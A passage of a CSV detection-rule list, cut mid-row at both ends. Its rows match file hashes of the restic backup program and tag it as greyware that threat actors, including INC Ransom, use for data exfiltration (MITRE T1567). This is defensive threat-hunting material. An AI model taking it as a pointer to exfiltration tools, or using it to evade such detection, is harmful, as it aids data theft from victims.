Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*91ab146f1353958d24cc4d3c909de7bfb2d83abc348e5aa96dd57262c38a024f*",".{0,1000}91ab146f1353958d24cc4d3c909de7bfb2d83abc348e5aa96dd57262c38a024f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*91b92f7f1c87b8b7ebf5ccc9b986fff74322cb349492852f6bfe7eb44bf8b3d1*",".{0,1000}91b92f7f1c87b8b7ebf5ccc9b986fff74322cb349492852f6bfe7eb44bf8b3d1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9242f2e59ea99bd890e8f92b95a91a4237df9572fc93c6bc64997d5705ae03bc*",".{0,1000}9242f2e59ea99bd890e8f92b95a91a4237df9572fc93c6bc64997d5705ae03bc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9245cafed0bc3f0531950cb8f31e3b7c2711a2785c79ec088d554bb8fe16ae81*",".{0,1000}9245cafed0bc3f0531950cb8f31e3b7c2711a2785c79ec088d554bb8fe16ae81.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*92a895f1fc289a338ff9008045e94525099421d66829dece14c9eb880f685280*",".{0,1000}92a895f1fc289a338ff9008045e94525099421d66829dece14c9eb880f685280.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*92aa5912f3ba113f7a763afae465ec6cae0542db7e81a544e84db144526ca887*",".{0,1000}92aa5912f3ba113f7a763afae465ec6cae0542db7e81a544e84db144526ca887.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*92e6621b5b0f2972111efcfc6e09c3102e1872d2358350901deea1d2d363776a*",".{0,1000}92e6621b5b0f2972111efcfc6e09c3102e1872d2358350901deea1d2d363776a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*93bd89817c42e31310485eaa1532e6431b557e2b2850f9dcbfa5cd6b4b60b189*",".{0,1000}93bd89817c42e31310485eaa1532e6431b557e2b2850f9dcbfa5cd6b4b60b189.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9426eb3d0fe973759d8337e545a88489798fe415c608c0fe29cceabeac8f63ab*",".{0,1000}9426eb3d0fe973759d8337e545a88489798fe415c608c0fe29cceabeac8f63ab.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*94d14e87eee41566909017eb8847693a2c1d81c3d448e8c01b1042be30757924*",".{0,1000}94d14e87eee41566909017eb8847693a2c1d81c3d448e8c01b1042be30757924.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*959bfdfe33740591330185406539399037eace2cd21bad62dc057db6ffd30656*",".{0,1000}959bfdfe33740591330185406539399037eace2cd21bad62dc057db6ffd30656.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*95d33e96934486c49553d1c4f2371d92b257795dc8318ffcbded329117e83145*",".{0,1000}95d33e96934486c49553d1c4f2371d92b257795dc8318ffcbded329117e83145.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*96167e823996cae90da9da2c7e686d966028b8204d0cb92f12535e055d15cb9a*",".{0,1000}96167e823996cae90da9da2c7e686d966028b8204d0cb92f12535e055d15cb9a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*96257ac3f78ba98e844960d52a2341815c3c9af0d5293cf0dc253a1b7f2a7c55*",".{0,1000}96257ac3f78ba98e844960d52a2341815c3c9af0d5293cf0dc253a1b7f2a7c55.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*969e56154298f0996396bf310bb745cfa549b2396765a49dc1611db1f118d2ca*",".{0,1000}969e56154298f0996396bf310bb745cfa549b2396765a49dc1611db1f118d2ca.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*96ac901e030641264cde78441b64bb6e20e2e1eb33b55b79408ecfd23bacbc7d*",".{0,1000}96ac901e030641264cde78441b64bb6e20e2e1eb33b55b79408ecfd23bacbc7d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*96fc55faff503465ff38e6bbbb21fc6365f11b52756d0b82db3a52b3f5487af7*",".{0,1000}96fc55faff503465ff38e6bbbb21fc6365f11b52756d0b82db3a52b3f5487af7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9796b2639dcac4c2a68c53344b8382ce959d1b1e68798a9bf7877353c9ad2a3b*",".{0,1000}9796b2639dcac4c2a68c53344b8382ce959d1b1e68798a9bf7877353c9ad2a3b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*97c9f305d684472b85157d1a2acc15364fa1999a25ddf50b40f5e76ef2fb8961*",".{0,1000}97c9f305d684472b85157d1a2acc15364fa1999a25ddf50b40f5e76ef2fb8961.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9827be6db4d39ec8963785cc91b176304d9cf7896820b65dbabe6bbe8eaef0bf*",".{0,1000}9827be6db4d39ec8963785cc91b176304d9cf7896820b65dbabe6bbe8eaef0bf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9834dd77457930e3d90e08bb26c0d14c29fd01dd9fb51292c1ac16cc93041abc*",".{0,1000}9834dd77457930e3d90e08bb26c0d14c29fd01dd9fb51292c1ac16cc93041abc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*98394683d8f30ce9fb313100f593dc16e97a52723b18d534cf586391a97cdc1d*",".{0,1000}98394683d8f30ce9fb313100f593dc16e97a52723b18d534cf586391a97cdc1d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*98f818a90ad8640c5f56c5d73ce5bc45ac0857d8a9d8d173d0101ee7e4aa19fe*",".{0,1000}98f818a90ad8640c5f56c5d73ce5bc45ac0857d8a9d8d173d0101ee7e4aa19fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*99759813456c7857b5792debb24f09d98f946bf012f8436e94420c7195701bbd*",".{0,1000}99759813456c7857b5792debb24f09d98f946bf012f8436e94420c7195701bbd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9acc803db3f5e4b87282da31d1f402958f6344c90afd74abd5609bd0a9449b56*",".{0,1000}9acc803db3f5e4b87282da31d1f402958f6344c90afd74abd5609bd0a9449b56.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9af5233ce7294cec25fa60e36a47dd8d0eac6fe4d0f6ab1180291545f4dcf5b6*",".{0,1000}9af5233ce7294cec25fa60e36a47dd8d0eac6fe4d0f6ab1180291545f4dcf5b6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9b3dde2aa24d611f7042f7248ec066f29d243b8b351a1530d5b2cea145c6dfaa*",".{0,1000}9b3dde2aa24d611f7042f7248ec066f29d243b8b351a1530d5b2cea145c6dfaa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9b5ac6a354462e1d547aa65f9c29632092a93861190b3c0a03534b1ec016a5e1*",".{0,1000}9b5ac6a354462e1d547aa65f9c29632092a93861190b3c0a03534b1ec016a5e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9b7e9ebb1641ab9798d06e550317afc5999c25eff3abe28a8f21b6344fab7622*",".{0,1000}9b7e9ebb1641ab9798d06e550317afc5999c25eff3abe28a8f21b6344fab7622.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9c3aa9197679d1cee2f74e0e1938ebc759648520d3cfb02dfb7f0422bd234e2b*",".{0,1000}9c3aa9197679d1cee2f74e0e1938ebc759648520d3cfb02dfb7f0422bd234e2b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9d2f44538ea0c6309426cb290d3a6b8b0b85de5de7f1496ff40c843b36bf8a8d*",".{0,1000}9d2f44538ea0c6309426cb290d3a6b8b0b85de5de7f1496ff40c843b36bf8a8d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*9d3d2e4222e2352d476cfe71afba982fcabd38e2e5c27a43bc126de2c33e353b*",".{0,1000}9d3d2e4222e2352d476cfe71afba982fcabd38e2e5c27a43bc126de2c33e353b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9ec893fc952f4e45307f8cd603b6de2f396e1ad757af6847c00a148257c0dfb7*",".{0,1000}9ec893fc952f4e45307f8cd603b6de2f396e1ad757af6847c00a148257c0dfb7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9ee0e699972c2614e3b1eb3c803caff659a64bb8d2c14ba07d520944758cf0a6*",".{0,1000}9ee0e699972c2614e3b1eb3c803caff659a64bb8d2c14ba07d520944758cf0a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9ffa244293433033702bbbbddf85e116221a7ff75c0b2bd152d9da8b6263ea6f*",".{0,1000}9ffa244293433033702bbbbddf85e116221a7ff75c0b2bd152d9da8b6263ea6f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a0f82a1dfbc7ff306b986ef88ecd57d1ab08f499cee267184bd5cdb5d9bad6a6*",".{0,1000}a0f82a1dfbc7ff306b986ef88ecd57d1ab08f499cee267184bd5cdb5d9bad6a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a10a8b566860339bfd6832fc9073862c8689a1645236ad3d4eafa500f9c536a4*",".{0,1000}a10a8b566860339bfd6832fc9073862c8689a1645236ad3d4eafa500f9c536a4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a1ad8df9d1ea7ad06e8d124238448640fdaadc708b61e38ca378de15aac47e5a*",".{0,1000}a1ad8df9d1ea7ad06e8d124238448640fdaadc708b61e38ca378de15aac47e5a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a1bc2b5bd61ba0f7babdec16c86b0715156d3577dbdbcd2863a2b2fa19df7606*",".{0,1000}a1bc2b5bd61ba0f7babdec16c86b0715156d3577dbdbcd2863a2b2fa19df7606.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a1fccf26ba0a2f7ae387b9e639c8e87885ac5fca39e9eb3a24d7386d296252c2*",".{0,1000}a1fccf26ba0a2f7ae387b9e639c8e87885ac5fca39e9eb3a24d7386d296252c2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a1fec79b3327cadea501d3dda9437a38184fc2ef3981f1b8d92245aaf8213007*",".{0,1000}a1fec79b3327cadea501d3dda9437a38184fc2ef3981f1b8d92245aaf8213007.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a20cd9ca2f6e691c531cf7d30c46bfadce77e609c90a5fe4b37254f14e5a934f*",".{0,1000}a20cd9ca2f6e691c531cf7d30c46bfadce77e609c90a5fe4b37254f14e5a934f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a2299ebe21ea5937b4a8b561f951eb0baab03299431b2142af521ff7f230045b*",".{0,1000}a2299ebe21ea5937b4a8b561f951eb0baab03299431b2142af521ff7f230045b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a27ce45798527f143d059cfecd0d2c8e976da75ae6c70f4eaeced862062f044d*",".{0,1000}a27ce45798527f143d059cfecd0d2c8e976da75ae6c70f4eaeced862062f044d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*a393bd2a8a781b63fd58b3b343222ff70c8f7669be23078f844a101144368800*",".{0,1000}a393bd2a8a781b63fd58b3b343222ff70c8f7669be23078f844a101144368800.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a3eacf76e0d6b305982cba0115dff905c8de86bd2768011b41338f8d276e0c1c*",".{0,1000}a3eacf76e0d6b305982cba0115dff905c8de86bd2768011b41338f8d276e0c1c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a4239ce6da7f2934b3d732865bbfe7a866efbdcda80258bc4a247d3def967f9c*",".{0,1000}a4239ce6da7f2934b3d732865bbfe7a866efbdcda80258bc4a247d3def967f9c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a47c13e667e16a8598e32ae5ed11e2d04dc8846af682ea3aebe42716e964a278*",".{0,1000}a47c13e667e16a8598e32ae5ed11e2d04dc8846af682ea3aebe42716e964a278.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a50a1a9bd8b387a4e1762adb62f09c416835aa15de9a27e79815b5b62c5951ec*",".{0,1000}a50a1a9bd8b387a4e1762adb62f09c416835aa15de9a27e79815b5b62c5951ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a5581e05f792ca9ddec49004a9e3c9d203663e1b2ab330364d1e6ccb32bd8226*",".{0,1000}a5581e05f792ca9ddec49004a9e3c9d203663e1b2ab330364d1e6ccb32bd8226.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a58c0cd4b456e360cfda39c325137343484606e93b500142a2a6730dd0b9dae1*",".{0,1000}a58c0cd4b456e360cfda39c325137343484606e93b500142a2a6730dd0b9dae1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a6e54383b67446523cb54671b2ce35167bd8c4b9a507025862fed74f0ebe27f2*",".{0,1000}a6e54383b67446523cb54671b2ce35167bd8c4b9a507025862fed74f0ebe27f2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a6ebeb84345adc07ff6fad6bc4e8f404dbad73c106a6e2f8a7f635e062efe9ed*",".{0,1000}a6ebeb84345adc07ff6fad6bc4e8f404dbad73c106a6e2f8a7f635e062efe9ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a7a82eca050224c9cd070fea1d4208fe92358c5942321d6e01eff84a77839fb8*",".{0,1000}a7a82eca050224c9cd070fea1d4208fe92358c5942321d6e01eff84a77839fb8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a7eec25a26998f786481137e8bca3b7fce2275502cec2221a01113c7811fbf48*",".{0,1000}a7eec25a26998f786481137e8bca3b7fce2275502cec2221a01113c7811fbf48.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a85ff11195be3386ea7d68cb9bf2fa7c43896ce22b8a5f95b63b5737a6fb388e*",".{0,1000}a85ff11195be3386ea7d68cb9bf2fa7c43896ce22b8a5f95b63b5737a6fb388e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a88ca09d1dd051d470965667a224a2b81930c6628a0566b7b17868be40207dc8*",".{0,1000}a88ca09d1dd051d470965667a224a2b81930c6628a0566b7b17868be40207dc8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*a907b585267cc24f1b884ace352eaca2f987c0aaf72b344a6b0da8264c5cf6a9*",".{0,1000}a907b585267cc24f1b884ace352eaca2f987c0aaf72b344a6b0da8264c5cf6a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a9080fc18d6015126864873dba3307b2b9c8ab5ecf79da3c1ae25cb2988fc9bd*",".{0,1000}a9080fc18d6015126864873dba3307b2b9c8ab5ecf79da3c1ae25cb2988fc9bd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a94d6c1feb0034fcff3e8b4f2d65c0678f906fc21a1cf2d435341f69e7e7af52*",".{0,1000}a94d6c1feb0034fcff3e8b4f2d65c0678f906fc21a1cf2d435341f69e7e7af52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a9507a67b50c7e4ab38c2334ef037a78ca5cc257decf1d78b8afbdc0fa73ee18*",".{0,1000}a9507a67b50c7e4ab38c2334ef037a78ca5cc257decf1d78b8afbdc0fa73ee18.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*a9c88d5288ce04a6cc78afcda7590d3124966dab3daa9908de9b3e492e2925fb*",".{0,1000}a9c88d5288ce04a6cc78afcda7590d3124966dab3daa9908de9b3e492e2925fb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*aa834effee692d7aed5973dee1d810420c0d3b98eb8a3b89620c207bff01f78e*",".{0,1000}aa834effee692d7aed5973dee1d810420c0d3b98eb8a3b89620c207bff01f78e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*aa86e5667c46ab0bdf8ceca80fa3c8775da2bbc18656250a745ac8b042837a70*",".{0,1000}aa86e5667c46ab0bdf8ceca80fa3c8775da2bbc18656250a745ac8b042837a70.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 